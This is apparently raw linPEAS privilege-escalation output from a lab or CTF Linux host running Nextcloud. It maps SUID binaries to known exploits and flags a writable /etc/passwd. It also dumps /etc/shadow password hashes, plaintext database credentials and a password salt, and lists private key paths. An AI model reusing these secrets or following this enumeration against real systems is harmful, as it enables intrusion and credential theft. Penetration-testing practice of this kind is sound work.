-rwsr-xr-x. 1 root root 48K May 9 14:02 /usr/bin/mount ---> Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8
-rwsr-xr-x. 1 root root 36K May 9 14:02 /usr/bin/umount ---> BSD/Linux(08-1996)
-rwsr-xr-x. 1 root root 57K Oct 31 2022 /usr/bin/crontab
---s--x--x. 1 root root 181K Apr 24 01:18 /usr/bin/sudo ---> check_if_the_sudo_version_is_vulnerable
-rwsr-xr-x. 1 root root 32K May 14 2022 /usr/bin/passwd ---> Apple_Mac_OSX(03-2006)/Solaris_8/9(12-2004)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1(02-1997)
-rwsr-xr-x. 1 root root 16K Apr 12 17:39 /usr/sbin/pam_timestamp_check
-rwsr-xr-x. 1 root root 24K Apr 12 17:39 /usr/sbin/unix_chkpwd
-rwsr-xr-x. 1 root root 16K Apr 29 16:56 /usr/sbin/grub2-set-bootflag (Unknown SUID binary!)

╔══════════╣ SGID
https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid
-rwxr-sr-x. 1 root tty 24K May 9 14:02 /usr/bin/write
-rwx--s--x. 1 root utmp 16K May 16 2022 /usr/libexec/utempter/utempter
-r-xr-sr-x. 1 root ssh_keys 330K May 9 13:14 /usr/libexec/openssh/ssh-keysign

╔══════════╣ Capabilities
https://book.hacktricks.xyz/linux-hardening/privilege-escalation#capabilities
══╣ Current shell capabilities
CapInh: 0x0000000000000000=
CapPrm: 0x000001ffffffffff=cap_chown,cap_dac_override,cap_dac_read_search,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_linux_immutable,cap_net_bind_service,cap_net_broadcast,cap_net_admin,cap_net_raw,cap_ipc_lock,cap_ipc_owner,cap_sys_module,cap_sys_rawio,cap_sys_chroot,cap_sys_ptrace,cap_sys_pacct,cap_sys_admin,cap_sys_boot,cap_sys_nice,cap_sys_resource,cap_sys_time,cap_sys_tty_config,cap_mknod,cap_lease,cap_audit_write,cap_audit_control,cap_setfcap,cap_mac_override,cap_mac_admin,cap_syslog,cap_wake_alarm,cap_block_suspend,cap_audit_read,cap_perfmon,cap_bpf,cap_checkpoint_restore
CapEff: 0x000001ffffffffff=cap_chown,cap_dac_override,cap_dac_read_search,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_linux_immutable,cap_net_bind_service,cap_net_broadcast,cap_net_admin,cap_net_raw,cap_ipc_lock,cap_ipc_owner,cap_sys_module,cap_sys_rawio,cap_sys_chroot,cap_sys_ptrace,cap_sys_pacct,cap_sys_admin,cap_sys_boot,cap_sys_nice,cap_sys_resource,cap_sys_time,cap_sys_tty_config,cap_mknod,cap_lease,cap_audit_write,cap_audit_control,cap_setfcap,cap_mac_override,cap_mac_admin,cap_syslog,cap_wake_alarm,cap_block_suspend,cap_audit_read,cap_perfmon,cap_bpf,cap_checkpoint_restore
CapBnd: 0x000001ffffffffff=cap_chown,cap_dac_override,cap_dac_read_search,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_linux_immutable,cap_net_bind_service,cap_net_broadcast,cap_net_admin,cap_net_raw,cap_ipc_lock,cap_ipc_owner,cap_sys_module,cap_sys_rawio,cap_sys_chroot,cap_sys_ptrace,cap_sys_pacct,cap_sys_admin,cap_sys_boot,cap_sys_nice,cap_sys_resource,cap_sys_time,cap_sys_tty_config,cap_mknod,cap_lease,cap_audit_write,cap_audit_control,cap_setfcap,cap_mac_override,cap_mac_admin,cap_syslog,cap_wake_alarm,cap_block_suspend,cap_audit_read,cap_perfmon,cap_bpf,cap_checkpoint_restore
CapAmb: 0x0000000000000000=

══╣ Parent process capabilities
CapInh: 0x0000000000000000=
CapPrm: 0x000001ffffffffff=cap_chown,cap_dac_override,cap_dac_read_search,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_linux_immutable,cap_net_bind_service,cap_net_broadcast,cap_net_admin,cap_net_raw,cap_ipc_lock,cap_ipc_owner,cap_sys_module,cap_sys_rawio,cap_sys_chroot,cap_sys_ptrace,cap_sys_pacct,cap_sys_admin,cap_sys_boot,cap_sys_nice,cap_sys_resource,cap_sys_time,cap_sys_tty_config,cap_mknod,cap_lease,cap_audit_write,cap_audit_control,cap_setfcap,cap_mac_override,cap_mac_admin,cap_syslog,cap_wake_alarm,cap_block_suspend,cap_audit_read,cap_perfmon,cap_bpf,cap_checkpoint_restore
CapEff: 0x000001ffffffffff=cap_chown,cap_dac_override,cap_dac_read_search,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_linux_immutable,cap_net_bind_service,cap_net_broadcast,cap_net_admin,cap_net_raw,cap_ipc_lock,cap_ipc_owner,cap_sys_module,cap_sys_rawio,cap_sys_chroot,cap_sys_ptrace,cap_sys_pacct,cap_sys_admin,cap_sys_boot,cap_sys_nice,cap_sys_resource,cap_sys_time,cap_sys_tty_config,cap_mknod,cap_lease,cap_audit_write,cap_audit_control,cap_setfcap,cap_mac_override,cap_mac_admin,cap_syslog,cap_wake_alarm,cap_block_suspend,cap_audit_read,cap_perfmon,cap_bpf,cap_checkpoint_restore
CapBnd: 0x000001ffffffffff=cap_chown,cap_dac_override,cap_dac_read_search,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_linux_immutable,cap_net_bind_service,cap_net_broadcast,cap_net_admin,cap_net_raw,cap_ipc_lock,cap_ipc_owner,cap_sys_module,cap_sys_rawio,cap_sys_chroot,cap_sys_ptrace,cap_sys_pacct,cap_sys_admin,cap_sys_boot,cap_sys_nice,cap_sys_resource,cap_sys_time,cap_sys_tty_config,cap_mknod,cap_lease,cap_audit_write,cap_audit_control,cap_setfcap,cap_mac_override,cap_mac_admin,cap_syslog,cap_wake_alarm,cap_block_suspend,cap_audit_read,cap_perfmon,cap_bpf,cap_checkpoint_restore
CapAmb: 0x0000000000000000=


Files with capabilities (limited to 50):
/usr/bin/newgidmap cap_setgid=ep
/usr/bin/newuidmap cap_setuid=ep
/usr/bin/arping cap_net_raw=p
/usr/bin/clockdiff cap_net_raw=p
/usr/sbin/suexec cap_setgid,cap_setuid=ep

╔══════════╣ Files with ACLs (limited to 50)
https://book.hacktricks.xyz/linux-hardening/privilege-escalation#acls
files with acls in searched folders Not Found

╔══════════╣ Files (scripts) in /etc/profile.d/
https://book.hacktricks.xyz/linux-hardening/privilege-escalation#profiles-files

╔══════════╣ Permissions in init, init.d, systemd, and rc.d
https://book.hacktricks.xyz/linux-hardening/privilege-escalation#init-init-d-systemd-and-rc-d

═╣ Hashes inside passwd file? ........... No
═╣ Writable passwd file? ................ /etc/passwd is writable
═╣ Credentials in fstab/mtab? ........... No
═╣ Can I read shadow files? ............. root:$6$0.xQQWtTptj.bNlO$HuPdaQId8b.EuOFbXguwDD6pOdPN4TCzYWPiz9cL6Kmdx5OxkujoLCTbURlT0h5QWgw5CEU6UL8qKPa.Ln8bI1:19517:0:99999:7:::
bin:*:19295:0:99999:7:::
daemon:*:19295:0:99999:7:::
adm:*:19295:0:99999:7:::
lp:*:19295:0:99999:7:::
sync:*:19295:0:99999:7:::
shutdown:*:19295:0:99999:7:::
halt:*:19295:0:99999:7:::
mail:*:19295:0:99999:7:::
operator:*:19295:0:99999:7:::
games:*:19295:0:99999:7:::
ftp:*:19295:0:99999:7:::
nobody:*:19295:0:99999:7:::
systemd-coredump:!!:19493::::::
dbus:!!:19493::::::
tss:!!:19493::::::
sssd:!!:19493::::::
chrony:!!:19493::::::
sshd:!!:19493::::::
systemd-oom:!*:19493::::::
apache:!!:19493::::::
mysql:!!:19493::::::
nginx:!!:19493::::::
echo.rivers:$6$bc2HjlhPlwGI4RcZ$Xv5v5Gz3VvyYqEvl.tYtrN1MUk8ae9IOWkCMHj4LdzUvcKcc7nHSJ2vWZYmTteS4mnEuU6h5sGCfqhdDX.Mt8.:19502:0:99999:7:::
root:$6$TmCYXsD6GsLRMRO5$XmB6Ol5f.j8q2z31kfdTVNnBfGiERMgNsPrakaXO7/wR9Mniq85ALhCy1lSJflik7qiTwXsOLJ1AybcV1TvBG.::0:99999:7:::
bin:*:19295:0:99999:7:::
daemon:*:19295:0:99999:7:::
adm:*:19295:0:99999:7:::
lp:*:19295:0:99999:7:::
sync:*:19295:0:99999:7:::
shutdown:*:19295:0:99999:7:::
halt:*:19295:0:99999:7:::
mail:*:19295:0:99999:7:::
operator:*:19295:0:99999:7:::
games:*:19295:0:99999:7:::
ftp:*:19295:0:99999:7:::
nobody:*:19295:0:99999:7:::
systemd-coredump:!!:19493::::::
dbus:!!:19493::::::
tss:!!:19493::::::
sssd:!!:19493::::::
chrony:!!:19493::::::
sshd:!!:19493::::::
systemd-oom:!*:19493::::::
apache:!!:19493::::::
mysql:!!:19493::::::
nginx:!!:19493::::::
root:::
bin:::
daemon:::
sys:::
adm:::
tty:::
disk:::
lp:::
mem:::
kmem:::
wheel:::
cdrom:::
mail:::
man:::
dialout:::
floppy:::
games:::
tape:::
video:::
ftp:::
lock:::
audio:::
users:::
nobody:::
utmp:!::
utempter:!::
ssh_keys:!::
input:!::
kvm:!::
render:!::
systemd-journal:!::
systemd-coredump:!::
dbus:!::
tss:!::
sssd:!::
chrony:!::
sshd:!::
sgx:!*::
systemd-oom:!*::
apache:!::
mysql:!::
nginx:!::
echo.rivers:!::
root:::
bin:::
daemon:::
sys:::
adm:::
tty:::
disk:::
lp:::
mem:::
kmem:::
wheel:::
cdrom:::
mail:::
man:::
dialout:::
floppy:::
games:::
tape:::
video:::
ftp:::
lock:::
audio:::
users:::
nobody:::
utmp:!::
utempter:!::
ssh_keys:!::
input:!::
kvm:!::
render:!::
systemd-journal:!::
systemd-coredump:!::
dbus:!::
tss:!::
sssd:!::
chrony:!::
sshd:!::
sgx:!*::
systemd-oom:!*::
apache:!::
mysql:!::
nginx:!::
═╣ Can I read shadow plists? ............ No
═╣ Can I write shadow plists? ........... No
═╣ Can I read opasswd file? ............. ═╣ Can I write in network-scripts? ...... You have write privileges on /etc/sysconfig/network-scripts/
/etc/sysconfig/network-scripts/readme-ifcfg-rh.txt
═╣ Can I read root folder? .............. total 40
dr-xr-x---. 4 root root 4096 Jul 18 13:39 .
dr-xr-xr-x. 18 root root 251 Jul 18 13:27 ..
lrwxrwxrwx. 1 root root 9 May 25 08:43 .bash_history -> /dev/null
-rw-r--r--. 1 root root 18 May 11 2022 .bash_logout
-rw-r--r--. 1 root root 141 May 11 2022 .bash_profile
-rw-r--r--. 1 root root 429 May 11 2022 .bashrc
-rw-r--r--. 1 root root 100 May 11 2022 .cshrc
drwx------. 3 root root 69 Jul 18 13:39 .gnupg
-rw-------. 1 root root 20 May 18 15:27 .lesshst
lrwxrwxrwx. 1 root root 9 May 25 08:42 .mysql_history -> /dev/null
drwx------. 2 root root 53 Jul 18 13:36 .ssh
-rw-r--r--. 1 root root 129 May 11 2022 .tcshrc
-rw-------. 1 root root 850 Jul 15 10:47 .viminfo
-rw-------. 1 root root 1156 May 16 13:03 anaconda-ks.cfg
-rw-r-----. 1 root root 41 Jul 15 10:47 user.txt

╔══════════╣ Searching root files in home dirs (limit 30)
/home/
/home/echo.rivers/.bash_history
/root/
/root/.bash_logout
/root/.bash_profile
/root/.bashrc
/root/.cshrc
/root/.tcshrc
/root/anaconda-ks.cfg
/root/.ssh
/root/.ssh/authorized_keys2
/root/.ssh/authorized_keys
/root/.lesshst
/root/.mysql_history
/root/.bash_history
/root/user.txt
/root/.viminfo
/root/.gnupg
/root/.gnupg/pubring.kbx
/root/.gnupg/trustdb.gpg
/root/.gnupg/private-keys-v1.d
/var/www
/var/www/cgi-bin
/var/www/html



╔═════════════════════════╗
════════════════════════════╣ Other Interesting Files ╠════════════════════════════
╚═════════════════════════╝
╔══════════╣ .sh files in path
https://book.hacktricks.xyz/linux-hardening/privilege-escalation#script-binaries-in-path
/usr/bin/gettext.sh
/usr/bin/lesspipe.sh
/usr/bin/rescan-scsi-bus.sh

╔══════════╣ Executable files potentially added by user (limit 70)
2023-05-16+13:01:47.4052548710 /boot/vmlinuz-0-rescue-bcdf7c70eb974d48881c9091f1d3f4ed

╔══════════╣ Unexpected in root
/afs
/.viminfo

╔══════════╣ Modified interesting files in the last 5mins (limit 100)
/etc/resolv.conf
/root/.ssh/authorized_keys2
/root/.ssh/authorized_keys
/root/.gnupg/pubring.kbx
/root/.gnupg/trustdb.gpg
/var/cache/dnf/expired_repos.json
/var/log/wtmp
/var/log/lastlog
/var/log/audit/audit.log
/var/log/dnf.log
/var/log/dnf.librepo.log
/var/log/dnf.rpm.log
/var/log/mariadb/mariadb.log
/var/log/httpd/access_log
/var/log/httpd/error_log
/var/log/php-fpm/error.log
/var/log/cron
/var/log/messages
/var/log/secure
/var/log/hawkey.log

╔══════════╣ Writable log files (logrotten) (limit 50)
https://book.hacktricks.xyz/linux-hardening/privilege-escalation#logrotate-exploitation
logrotate 3.18.0

Default mail command: /bin/mail
Default compress command: /bin/gzip
Default uncompress command: /bin/gunzip
Default compress extension: .gz
Default state file path: /var/lib/logrotate/logrotate.status
ACL support: yes
SELinux support: yes

╔══════════╣ Files inside /root (limit 20)
total 40
dr-xr-x---. 4 root root 4096 Jul 18 13:39 .
dr-xr-xr-x. 18 root root 251 Jul 18 13:27 ..
lrwxrwxrwx. 1 root root 9 May 25 08:43 .bash_history -> /dev/null
-rw-r--r--. 1 root root 18 May 11 2022 .bash_logout
-rw-r--r--. 1 root root 141 May 11 2022 .bash_profile
-rw-r--r--. 1 root root 429 May 11 2022 .bashrc
-rw-r--r--. 1 root root 100 May 11 2022 .cshrc
drwx------. 3 root root 69 Jul 18 13:39 .gnupg
-rw-------. 1 root root 20 May 18 15:27 .lesshst
lrwxrwxrwx. 1 root root 9 May 25 08:42 .mysql_history -> /dev/null
drwx------. 2 root root 53 Jul 18 13:36 .ssh
-rw-r--r--. 1 root root 129 May 11 2022 .tcshrc
-rw-------. 1 root root 850 Jul 15 10:47 .viminfo
-rw-------. 1 root root 1156 May 16 13:03 anaconda-ks.cfg
-rw-r-----. 1 root root 41 Jul 15 10:47 user.txt

╔══════════╣ Files inside others home (limit 20)
/home/echo.rivers/.bash_logout
/home/echo.rivers/.bash_profile
/home/echo.rivers/.bashrc
/home/echo.rivers/.gnupg/private-keys-v1.d/5DB4D1317999333A618EBC8798B2C12A1A17F101.key
/home/echo.rivers/.gnupg/private-keys-v1.d/ED1F31222B3549CF9D0A5B8224AA600251DE1E3A.key
/home/echo.rivers/.gnupg/pubring.kbx~
/home/echo.rivers/.gnupg/trustdb.gpg
/home/echo.rivers/.gnupg/openpgp-revocs.d/7A36416AB2965591F36931403945118A58F85241.rev
/home/echo.rivers/.gnupg/pubring.kbx
/home/echo.rivers/.gnupg/random_seed
/var/www/html/nextcloud/.user.ini
/var/www/html/nextcloud/3rdparty/christophwurst/id3parser/src/getID3/getid3_lib.php
/var/www/html/nextcloud/3rdparty/christophwurst/id3parser/src/getID3/getid3_handler.php
/var/www/html/nextcloud/3rdparty/christophwurst/id3parser/src/getID3/getid3_exception.php
/var/www/html/nextcloud/3rdparty/christophwurst/id3parser/src/getID3/getid3.php
/var/www/html/nextcloud/3rdparty/christophwurst/id3parser/src/getID3/Tags/getid3_id3v1.php
/var/www/html/nextcloud/3rdparty/christophwurst/id3parser/src/getID3/Tags/getid3_id3v2.php
/var/www/html/nextcloud/3rdparty/christophwurst/id3parser/src/ID3Parser.php
/var/www/html/nextcloud/3rdparty/christophwurst/id3parser/LICENSE
/var/www/html/nextcloud/3rdparty/composer/autoload_files.php

╔══════════╣ Searching installed mail applications

╔══════════╣ Mails (limit 50)
17015252 0 -rw-rw---- 1 echo.rivers mail 0 May 25 14:46 /var/mail/echo.rivers
17015252 0 -rw-rw---- 1 echo.rivers mail 0 May 25 14:46 /var/spool/mail/echo.rivers

╔══════════╣ Backup files (limited 100)
-rw-r--r--. 1 root root 1222 May 16 13:11 /etc/selinux/.config_backup
-rw-r--r--. 1 root root 356 May 16 13:03 /etc/firewalld/zones/public.xml.old
-rw-r--r--. 1 root root 2108 Sep 28 2022 /etc/nsswitch.conf.bak
-rw-rw----. 1 mysql mysql 2257 May 16 13:59 /var/lib/mysql/nextclouddb/oc_twofactor_backupcodes.frm
-rw-rw----. 1 mysql mysql 114688 May 17 08:05 /var/lib/mysql/nextclouddb/oc_twofactor_backupcodes.ibd
-rw-r--r--. 1 apache apache 2338 May 17 07:42 /var/www/html/nextcloud/apps/snappymail/app/snappymail/v/2.27.3/app/libraries/snappymail/pgp/backup.php
-rw-r--r--. 1 apache apache 1956 Apr 19 15:39 /var/www/html/nextcloud/core/doc/admin/_sources/maintenance/backup.rst.txt
-rw-r--r--. 1 apache apache 13014 Apr 19 15:41 /var/www/html/nextcloud/core/doc/admin/maintenance/backup.html
-rw-r--r--. 1 apache apache 10351 Apr 19 15:38 /var/www/html/nextcloud/dist/twofactor_backupcodes-settings.js
-rw-r--r--. 1 apache apache 34095 Apr 19 15:38 /var/www/html/nextcloud/dist/twofactor_backupcodes-settings.js.map
-rw-r--r--. 1 apache apache 2740 Apr 19 15:38 /var/www/html/nextcloud/dist/twofactor_backupcodes-settings.js.LICENSE.txt
-rw-r--r--. 1 apache apache 1019 May 25 08:41 /var/www/html/nextcloud/data/admin/files/operators_mail_backup.json.gpg
-rwxr-xr-x. 1 root root 47826 Aug 9 2022 /usr/bin/wsrep_sst_mariabackup
-rwxr-xr-x. 1 root root 24649888 Aug 9 2022 /usr/bin/mariadb-backup
-rwxr-xr-x. 1 root root 2952 Aug 9 2022 /usr/bin/wsrep_sst_backup
-rw-r--r--. 1 root root 5656 Mar 27 14:38 /usr/lib/modules/5.14.0-162.22.2.el9_1.x86_64/kernel/drivers/net/team/team_mode_activebackup.ko.xz
-rwxr-xr-x. 1 root root 44664 Apr 21 12:57 /usr/lib64/open-vm-tools/plugins/vmsvc/libvmbackup.so
-rw-r--r--. 1 root root 351 May 18 2022 /usr/share/man/man1/wsrep_sst_mariabackup.1.gz
-rw-r--r--. 1 root root 336 May 18 2022 /usr/share/man/man1/mariabackup.1.gz
-rw-r--r--. 1 root root 42 Aug 9 2022 /usr/share/man/man1/mariadb-backup.1.gz
-rw-r--r--. 1 root root 305 Jan 9 2020 /usr/share/doc/teamd/example_configs/activebackup_arp_ping_1.conf
-rw-r--r--. 1 root root 465 Jan 9 2020 /usr/share/doc/teamd/example_configs/activebackup_arp_ping_2.conf
-rw-r--r--. 1 root root 194 Jan 9 2020 /usr/share/doc/teamd/example_configs/activebackup_ethtool_1.conf
-rw-r--r--. 1 root root 212 Jan 9 2020 /usr/share/doc/teamd/example_configs/activebackup_ethtool_2.conf
-rw-r--r--. 1 root root 241 Jan 9 2020 /usr/share/doc/teamd/example_configs/activebackup_ethtool_3.conf
-rw-r--r--. 1 root root 447 Jan 9 2020 /usr/share/doc/teamd/example_configs/activebackup_multi_lw_1.conf
-rw-r--r--. 1 root root 285 Jan 9 2020 /usr/share/doc/teamd/example_configs/activebackup_nsna_ping_1.conf
-rw-r--r--. 1 root root 318 Jan 9 2020 /usr/share/doc/teamd/example_configs/activebackup_tipc.conf

╔══════════╣ Searching tables inside readable .db/.sql/.sqlite files (limit 100)
Found /var/lib/dnf/history.sqlite: SQLite 3.x database, last written using SQLite version 3034001
Found /var/lib/rpm/rpmdb.sqlite: SQLite 3.x database, last written using SQLite version 3034001

-> Extracting tables from /var/lib/dnf/history.sqlite (limit 20)
-> Extracting tables from /var/lib/rpm/rpmdb.sqlite (limit 20)

╔══════════╣ Web files?(output limit)
/var/www/:
total 4.0K
drwxr-xr-x. 4 root root 33 May 16 13:23 .
drwxr-xr-x. 20 root root 4.0K May 16 13:23 ..
drwxr-xr-x. 2 root root 6 May 9 03:44 cgi-bin
drwxr-xr-x. 3 root root 23 May 16 13:37 html

/var/www/cgi-bin:
total 0
drwxr-xr-x. 2 root root 6 May 9 03:44 .

╔══════════╣ All relevant hidden files (not in /sys/ or the ones listed in the previous check) (limit 70)
-rw-r--r--. 1 root root 18 Jan 23 17:42 /etc/skel/.bash_logout
-rw-r--r--. 1 root root 129 May 9 12:58 /etc/selinux/targeted/.policy.sha512
-rw-r--r--. 1 root root 1222 May 16 13:11 /etc/selinux/.config_backup
-rw-------. 1 root root 0 May 16 13:00 /etc/.pwd.lock
-rw-r--r--. 1 root root 208 May 16 13:00 /etc/.updated
-rw-r--r--. 1 root root 18 May 11 2022 /root/.bash_logout
-rw-r--r--. 1 root root 100 May 11 2022 /root/.cshrc
-rw-r--r--. 1 root root 129 May 11 2022 /root/.tcshrc
-rw-r--r--. 1 root root 0 May 16 13:00 /var/lib/rpm/.rpm.lock
-rw-r--r--. 1 root root 0 May 16 13:04 /var/lib/hyperv/.kvp_pool_0
-rw-r--r--. 1 root root 0 May 16 13:04 /var/lib/hyperv/.kvp_pool_1
-rw-r--r--. 1 root root 0 May 16 13:04 /var/lib/hyperv/.kvp_pool_2
-rw-r--r--. 1 root root 40960 Jul 18 13:35 /var/lib/hyperv/.kvp_pool_3
-rw-r--r--. 1 root root 0 May 16 13:04 /var/lib/hyperv/.kvp_pool_4
-rw-r--r--. 1 root root 14599 May 16 13:24 /var/lib/pear/.filemap
-rw-r--r--. 1 root root 0 May 16 13:24 /var/lib/pear/.lock
-rw-r--r--. 1 root root 208 May 16 13:00 /var/.updated
-rw-r--r--. 1 apache apache 101 Apr 19 15:38 /var/www/html/nextcloud/.user.ini
-rw-r--r--. 1 apache apache 29 Apr 19 15:38 /var/www/html/nextcloud/apps/comments/.bowerrc
-rw-r--r--. 1 apache apache 146 Apr 19 15:39 /var/www/html/nextcloud/apps/suspicious_login/.babelrc.js
-rw-r--r--. 1 apache apache 221 Jul 6 2022 /var/www/html/nextcloud/apps/suspicious_login/vendor/amphp/process/.php_cs
-rw-r--r--. 1 apache apache 268 Oct 25 2021 /var/www/html/nextcloud/apps/suspicious_login/vendor/amphp/sync/.php_cs.dist
-rw-r--r--. 1 apache apache 131 Dec 30 2022 /var/www/html/nextcloud/apps/suspicious_login/vendor/amphp/parser/.editorconfig
-rw-r--r--. 1 apache apache 223 Dec 30 2022 /var/www/html/nextcloud/apps/suspicious_login/vendor/amphp/parser/.php-cs-fixer.dist.php
-rw-r--r--. 1 apache apache 78 Dec 30 2022 /var/www/html/nextcloud/apps/suspicious_login/vendor/amphp/parallel/.valgrindrc
-rw-r--r--. 1 apache apache 302 Dec 30 2022 /var/www/html/nextcloud/apps/suspicious_login/vendor/amphp/parallel/.php_cs.dist
-rw-r--r--. 1 apache apache 268 Mar 25 2020 /var/www/html/nextcloud/apps/suspicious_login/vendor/amphp/serialization/.php_cs.dist
-rw-r--r--. 1 apache apache 4871 Apr 19 15:39 /var/www/html/nextcloud/apps/suspicious_login/vendor/rubix/ml/.php_cs.dist
-rw-r--r--. 1 apache apache 4891 May 25 2021 /var/www/html/nextcloud/apps/suspicious_login/vendor/rubix/tensor/.php_cs.dist
-rw-r--r--. 1 apache apache 375 Apr 19 15:39 /var/www/html/nextcloud/apps/suspicious_login/.nextcloudignore
-rw-r--r--. 1 apache apache 425 Apr 19 15:39 /var/www/html/nextcloud/apps/related_resources/.nextcloudignore
-rw-r--r--. 1 apache apache 10 Apr 19 15:39 /var/www/html/nextcloud/apps/viewer/.stylelintignore
-rw-r--r--. 1 apache apache 13 Nov 21 2022 /var/www/html/nextcloud/apps/photos/vendor/hexogen/kdtree/.styleci.yml
-rw-r--r--. 1 apache apache 312 Nov 21 2022 /var/www/html/nextcloud/apps/photos/vendor/hexogen/kdtree/.editorconfig
-rw-r--r--. 1 apache apache 291 Apr 19 15:39 /var/www/html/nextcloud/apps/bruteforcesettings/.nextcloudignore
-rw-r--r--. 1 apache apache 294 Apr 19 15:39 /var/www/html/nextcloud/apps/twofactor_totp/.nextcloudignore
-rw-r--r--. 1 apache apache 401 Apr 19 15:38 /var/www/html/nextcloud/apps/files_external/3rdparty/icewind/smb/.php_cs.dist
-rw-r--r--. 1 apache apache 165 Apr 19 15:39 /var/www/html/nextcloud/apps/text/.stylelintrc.js
-rw-r--r--. 1 apache apache 1041 May 16 14:20 /var/www/html/nextcloud/apps/cfg_share_links/vendor/doctrine/instantiator/.doctrine-project.json
-rw-r--r--. 1 apache apache 236 May 16 14:20 /var/www/html/nextcloud/apps/cfg_share_links/vendor/nextcloud/coding-standard/.php-cs-fixer.dist.php
-rw-r--r--. 1 apache apache 8011 May 16 14:20 /var/www/html/nextcloud/apps/cfg_share_links/vendor/phpunit/php-code-coverage/.php_cs.dist
-rw-r--r--. 1 apache apache 6628 May 16 14:20 /var/www/html/nextcloud/apps/cfg_share_links/vendor/phpunit/php-file-iterator/.php_cs.dist
-rw-r--r--. 1 apache apache 657 May 16 14:20 /var/www/html/nextcloud/apps/cfg_share_links/vendor/phpunit/phpunit/.phpstorm.meta.php
-rw-r--r--. 1 apache apache 302 May 16 14:20 /var/www/html/nextcloud/apps/cfg_share_links/vendor/psr/event-dispatcher/.editorconfig
-rw-r--r--. 1 apache apache 1937 May 16 14:20 /var/www/html/nextcloud/apps/cfg_share_links/vendor/sebastian/code-unit-reverse-lookup/.php_cs
-rw-r--r--. 1 apache apache 6666 May 16 14:20 /var/www/html/nextcloud/apps/cfg_share_links/vendor/sebastian/diff/.php_cs.dist
-rw-r--r--. 1 apache apache 12 May 16 14:20 /var/www/html/nextcloud/apps/cfg_share_links/vendor/sebastian/diff/tests/fixtures/.editorconfig
-rw-r--r--. 1 apache apache 12 May 16 14:20 /var/www/html/nextcloud/apps/cfg_share_links/vendor/sebastian/diff/tests/fixtures/out/.editorconfig
-rw-r--r--. 1 apache apache 7998 May 16 14:20 /var/www/html/nextcloud/apps/cfg_share_links/vendor/sebastian/global-state/.php_cs.dist
-rw-r--r--. 1 apache apache 1937 May 16 14:20 /var/www/html/nextcloud/apps/cfg_share_links/vendor/sebastian/object-enumerator/.php_cs
-rw-r--r--. 1 apache apache 2972 May 16 14:20 /var/www/html/nextcloud/apps/cfg_share_links/vendor/sebastian/object-reflector/.php_cs
-rw-r--r--. 1 apache apache 7789 May 16 14:20 /var/www/html/nextcloud/apps/cfg_share_links/vendor/sebastian/resource-operations/.php_cs.dist
-rw-r--r--. 1 apache apache 8083 May 16 14:20 /var/www/html/nextcloud/apps/cfg_share_links/vendor/sebastian/type/.php_cs.dist
-rw-r--r--. 1 apache apache 1919 May 16 14:20 /var/www/html/nextcloud/apps/cfg_share_links/vendor/sebastian/version/.php_cs
-rw-r--r--. 1 apache apache 11713 May 16 14:20 /var/www/html/nextcloud/apps/cfg_share_links/vendor/theseer/tokenizer/.php_cs.dist
-rw-r--r--. 1 apache apache 293 May 16 14:22 /var/www/html/nextcloud/apps/user_saml/.php-cs-fixer.dist.php
-rw-r--r--. 1 apache apache 293 May 16 14:22 /var/www/html/nextcloud/apps/user_saml/.php_cs-fixer.dist.php
-rw-r--r--. 1 apache apache 178 May 17 07:42 /var/www/html/nextcloud/apps/snappymail/app/snappymail/v/2.27.3/app/.htaccess
-rw-r--r--. 1 apache apache 1582 May 17 07:42 /var/www/html/nextcloud/apps/snappymail/app/.htaccess
-rw-r--r--. 1 apache apache 495 Apr 19 15:38 /var/www/html/nextcloud/config/.htaccess
-rw-r--r--. 1 apache apache 542 May 16 13:59 /var/www/html/nextcloud/data/.htaccess
-rw-r--r--. 1 apache apache 0 May 16 13:59 /var/www/html/nextcloud/data/.ocdata
-rw-------. 1 apache apache 18 May 17 07:42 /var/www/html/nextcloud/data/appdata_snappymail/_data_/_default_/.htaccess
-rw-r--r--. 1 apache apache 4426 May 16 15:04 /var/www/html/nextcloud/.htaccess
-rw-r--r--. 1 root root 173 Mar 27 14:31 /usr/lib/modules/5.14.0-162.22.2.el9_1.x86_64/.vmlinuz.hmac
-rw-r--r--. 1 root root 65 May 25 2022 /usr/lib64/.libgmp.so.10.4.0.hmac
-rw-r--r--. 1 root root 65 Oct 11 2022 /usr/lib64/.libhogweed.so.6.5.hmac
-rw-r--r--. 1 root root 65 Oct 11 2022 /usr/lib64/.libnettle.so.8.5.hmac
-rw-r--r--. 1 root root 403 May 9 05:51 /usr/lib64/.libgnutls.so.30.33.1.hmac
-rw-r--r--. 1 root root 40 Jan 23 17:44 /usr/share/man/man1/..1.gz

╔══════════╣ Readable files inside /tmp, /var/tmp, /private/tmp, /private/var/at/tmp, /private/var/tmp, and backup folders (limit 70)
-rw-------. 1 root root 79 Jul 18 13:27 /tmp/crontab.OoSx6j
-rwxrwxrwx. 1 root root 836190 Jul 2 00:28 /tmp/linpeas.sh
-rw-r--r--. 1 apache apache 2292 Apr 19 15:38 /var/www/html/nextcloud/3rdparty/aws/aws-sdk-php/src/data/backup/2018-11-15/paginators-1.json.php
-rw-r--r--. 1 apache apache 89029 Apr 19 15:38 /var/www/html/nextcloud/3rdparty/aws/aws-sdk-php/src/data/backup/2018-11-15/api-2.json.php
-rw-r--r--. 1 apache apache 4430 Apr 19 15:38 /var/www/html/nextcloud/3rdparty/aws/aws-sdk-php/src/data/backup/2018-11-15/endpoint-rule-set-1.json.php

╔══════════╣ Searching passwords in history files
// This file was auto-generated from sdk-root/src/data/endpoints_prefix_history.json

╔══════════╣ Searching passwords in config PHP files
password" name="password"
case DefinitionParameter::VALUE_PASSWORD: ?>
'dbpassword' => 'DhENL2JvRz5sTX',
'dbuser' => 'nextcloud',
'lost_password_link' => 'disabled',
'passwordsalt' => 'ZbwXq27T4qfGqqipdugBoXU5Dn+OjN',
'password' => 'swift',
'password' => 'Secr3tPaSSWoRdt7',
'password' => '', // Optional: if not defined, no password will be used.
